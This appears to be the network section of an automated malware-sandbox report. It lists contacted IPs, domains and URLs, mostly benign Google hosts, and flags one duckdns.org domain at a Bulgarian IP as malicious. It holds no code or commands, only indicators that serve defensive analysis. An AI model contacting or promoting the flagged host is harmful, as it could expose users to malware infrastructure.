IP Domain Country Flag ASN ASN Name Malicious
172.253.122.102
 plus.l.google.com United States
15169 GOOGLEUS false
87.121.105.4
 nmds.duckdns.org Bulgaria
43561 NET1-ASBG true
239.255.255.250
 unknown Reserved
unknown unknown false
172.253.115.147
 www.google.com United States
15169 GOOGLEUS false

Private

IP
192.168.2.4

Contacted Domains

Name IP Active
google.com 172.253.63.100 true
plus.l.google.com 172.253.122.102 true
nmds.duckdns.org 87.121.105.4 true
www.google.com 172.253.115.147 true
apis.google.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://www.google.com/async/ddljson?async=ntp:2 false
    		high
    nmds.duckdns.org true
    • 15%, Virustotal, Browse
    • Avira URL Cloud: malware
    		 unknown
    https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SCWmpDDGjPk.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AAAC/rs=AHpOoo_Pl64J0IIHlj2zBtEJ3ZwdaJC3HA/cb=gapi.loaded_0 false
      		high
      https://www.google.com/async/newtab_promos false
        		high
        https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0 false
          		high